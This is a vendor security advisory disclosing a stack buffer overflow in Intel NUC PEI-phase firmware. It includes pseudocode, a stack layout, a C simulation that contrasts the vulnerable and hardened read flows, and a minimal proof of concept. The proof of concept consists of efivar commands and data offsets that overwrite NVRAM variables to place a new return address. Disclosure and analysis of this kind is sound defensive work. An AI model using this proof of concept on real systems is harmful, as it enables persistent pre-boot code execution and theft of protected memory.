[BRLY-2022-027] Stack buffer overflow vulnerability leads to arbitrary code execution during the PEI phase on Intel platforms.

August 10, 2022

Summary

The BINARLY efiXplorer team has discovered a stack buffer overflow vulnerability on Intel platforms that allows a potential attacker to execute arbitrary code during the PEI phase.

Vulnerability Information

  • BINARLY internal vulnerability identifier: BRLY-2022-027
  • Intel PSIRT assigned CVE identifier: CVE-2022-28858
  • AMI PSIRT assigned CVE identifier: CVE-2022-26873
  • CERT/CC assigned case number: VU#158026
  • FwHunt rule: BRLY-2022-027
  • CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Affected Intel firmware with impact confirmed by the Binarly team

Device/Firmware | File Name                  | SHA256 (File PE32 section)                                       | File GUID
Intel NUC M15   | PlatformInitAdvancedPreMem | 644044fdb8daea30a7820e0f5f88dbf5cd460af72fbf70418e9d2e47efed8d9b | EEEE611D-F78F-4FB9-B868-55907F169280

Potential impact

A potential attacker can execute arbitrary code during the PEI phase and influence the subsequent boot stages. This can lead to bypassing of mitigations, disclosure of physical memory contents, discovery of secrets from any Virtual Machines (VMs), and bypassing of memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload that can be injected into SMRAM.

Vulnerability description

The pseudocode for the vulnerable function is shown below:

int __thiscall sub_FFAE2B82(void *this)
{
  ...
  const EFI_PEI_SERVICES **PeiServices;
  char CpuSetupData[1072];                 // fixed-size stack buffer shared by both reads
  UINTN DataSize;
  EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;

  ...
  DataSize = 1072;                         // set once, never reset between the two calls
  // Status ignored: if SaSetup is larger than 1072 bytes, the service reports
  // EFI_BUFFER_TOO_SMALL and writes the variable's real size into DataSize
  Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
  // Reads up to the (possibly enlarged) DataSize bytes into the same 1072-byte buffer
  Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
  ...
  return 0;
}

If the SaSetup NVRAM variable is larger than 1072 bytes, the first call of the Ppi->GetVariable() service fails with EFI_BUFFER_TOO_SMALL and, as the service's size-negotiation contract requires, overwrites DataSize with the real size of the SaSetup NVRAM variable. The return status is not checked and DataSize is not reset.

The second call of the Ppi->GetVariable() service then copies the CpuSetup NVRAM variable into the same 1072-byte CpuSetupData buffer using the enlarged DataSize, so a stack overflow may occur. As the stack frame layout below shows, only 0x10 bytes of locals and the 4-byte saved frame pointer separate the end of CpuSetupData from the return address, so an overflow of 24 bytes is enough to execute arbitrary code:

-00000440 CpuSetupData    db 1072 dup(?)
-00000010 var_10          db ?
-0000000F                 db ? ; undefined
-0000000E var_E           dd ?
-0000000A                 db ? ; undefined
-00000009                 db ? ; undefined
-00000008 DataSize        dd ?
-00000004 Ppi             dd ?                    ; offset
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
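The two-call pattern and the frame layout above, modelled as an added example written for this page (not Binarly's code and not the firmware's): a constructed mock of the GetVariable size-negotiation contract, the advisory's flow with one shared DataSize beside a hardened version that resets DataSize and checks the status, both run against a byte-array frame model whose offsets are taken from the stack listing. The mock store, MockGetVariable, Simulate, the sentinel and the result codes are assumptions of the example, not anything the advisory describes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal UEFI-style types; status values follow the UEFI spec encoding. */
typedef uintptr_t UINTN;
typedef UINTN     EFI_STATUS;
#define EFI_SUCCESS          ((EFI_STATUS)0)
#define ENCODE_ERROR(n)      (((EFI_STATUS)1 << (sizeof(UINTN) * 8 - 1)) | (EFI_STATUS)(n))
#define EFI_BUFFER_TOO_SMALL ENCODE_ERROR(5)
#define EFI_NOT_FOUND        ENCODE_ERROR(14)
#define EFI_ERROR(s)         ((intptr_t)(s) < 0)

/* Offsets from CpuSetupData, taken from the advisory's stack frame listing. */
#define SETUP_BUFFER_SIZE 0x430  /* 1072-byte local buffer */
#define RET_ADDR_OFFSET   0x444  /* saved return address, 0x14 bytes past the buffer */
#define FRAME_MODEL_SIZE  0x448  /* buffer + locals + saved frame pointer + return address */
enum { READ_OK = 0, READ_REJECTED = 1, RET_ADDR_CLOBBERED = 2 };  /* Simulate() results */

/* Constructed NVRAM store; an attacker controls these sizes through runtime variable writes. */
typedef struct { const char *Name; UINTN Size; uint8_t Fill; } MockVar;
static MockVar gStore[2];

/* Mock of the size-negotiation contract of EFI_PEI_READ_ONLY_VARIABLE2_PPI.GetVariable():
   too-small *DataSize -> *DataSize = required size, nothing copied, EFI_BUFFER_TOO_SMALL;
   otherwise copy and set *DataSize to the actual size. The real service trusts *DataSize
   completely; the single extra guard only keeps this simulation inside the frame model. */
static EFI_STATUS MockGetVariable(const char *Name, UINTN *DataSize, void *Data)
{
    for (size_t i = 0; i < sizeof gStore / sizeof gStore[0]; i++) {
        if (gStore[i].Name == NULL || strcmp(gStore[i].Name, Name) != 0)
            continue;
        if (*DataSize < gStore[i].Size) {
            *DataSize = gStore[i].Size;
            return EFI_BUFFER_TOO_SMALL;
        }
        if (gStore[i].Size > FRAME_MODEL_SIZE)  /* harness guard, not part of the PPI */
            return EFI_NOT_FOUND;
        memset(Data, gStore[i].Fill, gStore[i].Size);
        *DataSize = gStore[i].Size;
        return EFI_SUCCESS;
    }
    return EFI_NOT_FOUND;
}

/* Frame[0..SETUP_BUFFER_SIZE) plays the role of CpuSetupData; a sentinel in the
   return-address slot lets an overwrite be detected without crashing the process. */
static const uint32_t kReturnSentinel = 0xA5A5A5A5u;

static int ReturnSlotClobbered(const uint8_t *Frame)
{
    uint32_t Slot;
    memcpy(&Slot, Frame + RET_ADDR_OFFSET, sizeof Slot);
    return Slot != kReturnSentinel;
}

/* Same control flow as the advisory's pseudocode: one DataSize shared by both reads. */
static EFI_STATUS VulnerableFlow(uint8_t *Frame)
{
    UINTN DataSize = SETUP_BUFFER_SIZE;
    MockGetVariable("SaSetup", &DataSize, Frame);         /* status and DataSize unchecked */
    return MockGetVariable("CpuSetup", &DataSize, Frame); /* copies up to the enlarged size */
}

/* Hardened form: DataSize is reset to the buffer capacity before every call and the
   status is checked, so an oversized variable is rejected instead of copied. */
static EFI_STATUS HardenedFlow(uint8_t *Frame)
{
    static const char *const Names[] = { "SaSetup", "CpuSetup" };
    for (size_t i = 0; i < 2; i++) {
        UINTN DataSize = SETUP_BUFFER_SIZE;
        EFI_STATUS Status = MockGetVariable(Names[i], &DataSize, Frame);
        if (EFI_ERROR(Status))
            return Status;
    }
    return EFI_SUCCESS;
}

/* Runs one flow against constructed SaSetup/CpuSetup sizes and classifies the outcome. */
static int Simulate(UINTN SaSize, UINTN CpuSize, int Hardened)
{
    uint8_t Frame[FRAME_MODEL_SIZE];
    gStore[0] = (MockVar){ "SaSetup", SaSize, 0x41 };
    gStore[1] = (MockVar){ "CpuSetup", CpuSize, 0x42 };
    memset(Frame, 0, sizeof Frame);
    memcpy(Frame + RET_ADDR_OFFSET, &kReturnSentinel, sizeof kReturnSentinel);
    EFI_STATUS Status = Hardened ? HardenedFlow(Frame) : VulnerableFlow(Frame);
    if (ReturnSlotClobbered(Frame))
        return RET_ADDR_CLOBBERED;
    return EFI_ERROR(Status) ? READ_REJECTED : READ_OK;
}

int main(void)
{
    /* 0x448-byte variables follow the advisory's PoC layout; 0x400/0x244 fit in the buffer. */
    printf("vulnerable, oversized: %d (2 = return address overwritten)\n", Simulate(0x448, 0x448, 0));
    printf("hardened,   oversized: %d (1 = rejected, frame intact)\n",     Simulate(0x448, 0x448, 1));
    printf("vulnerable, in-bounds: %d (0 = ok)\n",                          Simulate(0x400, 0x244, 0));
    return 0;
}
```

The shared DataSize is also a latent functional bug, not only a memory-safety one: with the vulnerable flow, an in-bounds CpuSetup variable that happens to be larger than SaSetup (for instance 0x420 versus 0x400 bytes) is spuriously rejected, because the first call shrinks DataSize to SaSetup's size; the hardened flow reads it correctly. Resetting DataSize before each GetVariable call and acting on EFI_BUFFER_TOO_SMALL fixes both problems.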

Minimal POC

sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot

The data in the file SaSetupData_new.bin may be as follows:

Offset | Data
0x0    | Old data of SaSetup NVRAM variable
0x430  | Some data
0x444  | Last dword

The data in the file CpuSetupData_new.bin may be as follows:

Offset | Data
0x0    | Old data of CpuSetup NVRAM variable
0x244  | Some data
0x444  | New return address

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days have elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Disclosure Activity                  | Date
Intel PSIRT is notified              | 2022-02-11
Intel PSIRT confirmed reported issue | 2022-03-22
Intel PSIRT assigned CVE number      | 2022-03-22
Intel PSIRT provided patch release   | 2022-03-22
BINARLY public disclosure date       | 2022-08-10

Acknowledgements

BINARLY efiXplorer team

Tags
PEI